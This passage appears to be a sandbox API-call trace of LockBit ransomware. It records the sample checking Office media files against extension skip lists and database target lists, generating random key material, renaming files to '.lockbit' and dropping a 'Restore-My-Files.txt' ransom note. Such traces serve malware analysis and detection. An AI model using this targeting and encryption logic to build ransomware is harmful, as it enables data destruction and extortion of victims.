lpString2=".GIF") returned 1 [0204.921] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0204.921] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0204.921] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0204.921] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0204.921] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0204.922] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0204.922] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0204.922] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0115835.GIF") returned 1 [0204.922] lstrcmpiW (lpString1="ntldr", lpString2="J0115835.GIF") returned 1 [0204.922] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0115835.GIF") returned 1 [0204.922] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0115835.GIF") returned -1 [0204.922] lstrcmpiW (lpString1="autorun.inf", lpString2="J0115835.GIF") returned -1 [0204.922] lstrcmpiW (lpString1="thumbs.db", lpString2="J0115835.GIF") returned 1 [0204.922] lstrcmpiW (lpString1="iconcache.db", lpString2="J0115835.GIF") returned -1 [0204.922] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\") returned="" [0204.922] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115835.GIF") returned=".GIF" [0204.922] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0204.922] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0204.922] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0204.922] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0204.922] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0204.922] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0204.922] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0204.922] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0204.922] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0204.922] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0204.922] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0204.922] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0204.922] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0204.922] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0204.922] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0204.922] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0204.923] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0204.923] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0204.923] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0204.923] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0204.923] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0204.923] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0204.923] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0204.923] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0204.923] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0204.923] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0204.923] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0204.923] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0204.923] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115835.GIF.lockbit") returned 78 [0204.923] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115835.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\j0115835.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0204.925] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0204.925] malloc (_Size=0x40068) returned 0x3df0008 [0204.925] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=177) returned 1 [0204.925] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.925] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.925] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0204.925] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.926] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.926] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0204.926] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0204.931] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115835.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115835.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0204.931] malloc (_Size=0xb2) returned 0x1fa2ed8 [0204.931] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb2, FileInformationClass=0xa) returned 0xc0000008 [0204.931] free (_Block=0x1fa2ed8) [0204.931] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115835.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS") returned 1 [0204.931] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt") returned 78 [0204.931] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0204.931] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc555b400, ftCreationTime.dwHighDateTime=0x1bd8f91, ftLastAccessTime.dwLowDateTime=0xbd3e24a0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xc555b400, ftLastWriteTime.dwHighDateTime=0x1bd8f91, nFileSizeHigh=0x0, nFileSizeLow=0xad, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0115836.GIF", cAlternateFileName="")) returned 1 [0204.931] lstrcmpiW (lpString1=".", lpString2="J0115836.GIF") returned -1 [0204.931] lstrcmpiW (lpString1="..", lpString2="J0115836.GIF") returned -1 [0204.931] PathFindExtensionW (pszPath="J0115836.GIF") returned=".GIF" [0204.931] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0204.944] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0204.944] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0204.944] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0204.944] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0204.945] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0204.945] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0204.945] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0204.945] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0204.945] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0204.945] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0204.945] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0204.945] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0204.945] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0204.945] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0204.945] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0204.945] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0204.945] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0204.945] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0204.945] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0204.945] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0204.945] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0204.945] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0204.945] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0204.945] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0204.945] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0204.945] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0204.945] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0204.945] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0204.945] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0204.945] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0204.945] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0204.945] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0204.946] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0204.946] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0204.946] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0204.946] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0204.946] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0204.946] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0204.946] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0204.946] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0204.946] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0204.946] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0204.946] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0204.946] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0204.946] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0204.946] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0204.946] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0115836.GIF") returned 1 [0204.946] lstrcmpiW (lpString1="ntldr", lpString2="J0115836.GIF") returned 1 [0204.946] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0115836.GIF") returned 1 [0204.946] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0115836.GIF") returned -1 [0204.946] lstrcmpiW (lpString1="autorun.inf", lpString2="J0115836.GIF") returned -1 [0204.946] lstrcmpiW (lpString1="thumbs.db", lpString2="J0115836.GIF") returned 1 [0204.946] lstrcmpiW (lpString1="iconcache.db", lpString2="J0115836.GIF") returned -1 [0204.946] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\") returned="" [0204.946] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115836.GIF") returned=".GIF" [0204.946] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0204.946] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0204.946] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0204.946] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0204.947] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0204.947] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0204.947] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0204.947] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0204.947] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0204.947] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0204.947] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0204.947] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0204.947] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0204.947] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0204.947] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0204.947] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0204.947] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0204.947] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0204.947] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0204.947] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0204.947] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0204.947] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0204.947] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0204.947] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0204.947] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0204.947] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0204.947] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0204.947] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0204.947] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115836.GIF.lockbit") returned 78 [0204.947] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115836.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\j0115836.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0204.950] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0204.950] malloc (_Size=0x40068) returned 0x3df0008 [0204.950] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=173) returned 1 [0204.950] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.951] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.951] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0204.951] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.951] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.951] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0204.951] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0204.956] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115836.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115836.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0204.956] malloc (_Size=0xb2) returned 0x1fa2ed8 [0204.956] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb2, FileInformationClass=0xa) returned 0xc0000008 [0204.956] free (_Block=0x1fa2ed8) [0204.956] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115836.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS") returned 1 [0204.956] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt") returned 78 [0204.956] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0204.956] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x497bb300, ftCreationTime.dwHighDateTime=0x1bd9367, ftLastAccessTime.dwLowDateTime=0xbd3e24a0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x497bb300, ftLastWriteTime.dwHighDateTime=0x1bd9367, nFileSizeHigh=0x0, nFileSizeLow=0xbe, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0115839.GIF", cAlternateFileName="")) returned 1 [0204.956] lstrcmpiW (lpString1=".", lpString2="J0115839.GIF") returned -1 [0204.956] lstrcmpiW (lpString1="..", lpString2="J0115839.GIF") returned -1 [0204.956] PathFindExtensionW (pszPath="J0115839.GIF") returned=".GIF" [0204.956] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0204.956] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0204.956] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0204.956] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0204.956] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0204.956] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0204.956] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0204.956] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0204.956] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0204.956] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0204.957] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0204.957] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0204.957] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0204.957] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0204.957] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0204.957] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0204.957] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0204.957] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0204.957] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0204.957] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0204.957] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0204.957] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0204.957] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0204.957] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0204.957] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0204.957] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0204.957] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0204.957] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0204.957] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0204.957] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0204.957] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0204.957] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0204.957] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0204.957] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0204.957] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0204.957] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0204.957] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0204.957] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0204.957] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0204.958] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0204.958] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0204.958] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0204.958] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0204.958] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0204.958] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0204.958] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0204.958] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0204.958] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0115839.GIF") returned 1 [0204.958] lstrcmpiW (lpString1="ntldr", lpString2="J0115839.GIF") returned 1 [0204.958] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0115839.GIF") returned 1 [0204.958] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0115839.GIF") returned -1 [0204.958] lstrcmpiW (lpString1="autorun.inf", lpString2="J0115839.GIF") returned -1 [0204.958] lstrcmpiW (lpString1="thumbs.db", lpString2="J0115839.GIF") returned 1 [0204.958] lstrcmpiW (lpString1="iconcache.db", lpString2="J0115839.GIF") returned -1 [0204.958] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\") returned="" [0204.958] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115839.GIF") returned=".GIF" [0204.958] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0204.958] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0204.958] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0204.958] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0204.958] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0204.958] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0204.958] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0204.958] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0204.958] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0204.958] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0204.958] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0204.959] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0204.959] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0204.959] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0204.959] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0204.959] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0204.959] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0204.959] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0204.959] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0204.959] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0204.959] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0204.959] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0204.959] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0204.959] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0204.959] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0204.959] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0204.959] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0204.959] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0204.959] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115839.GIF.lockbit") returned 78 [0204.959] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115839.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\j0115839.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0204.961] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0204.961] malloc (_Size=0x40068) returned 0x3df0008 [0204.961] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=190) returned 1 [0204.961] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.962] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.962] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0204.962] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.962] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.962] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0204.962] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0204.967] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115839.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115839.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0204.967] malloc (_Size=0xb2) returned 0x1fa2ed8 [0204.967] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb2, FileInformationClass=0xa) returned 0xc0000008 [0204.967] free (_Block=0x1fa2ed8) [0204.967] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115839.GIF" | out: pszPath="C:\\\\Program 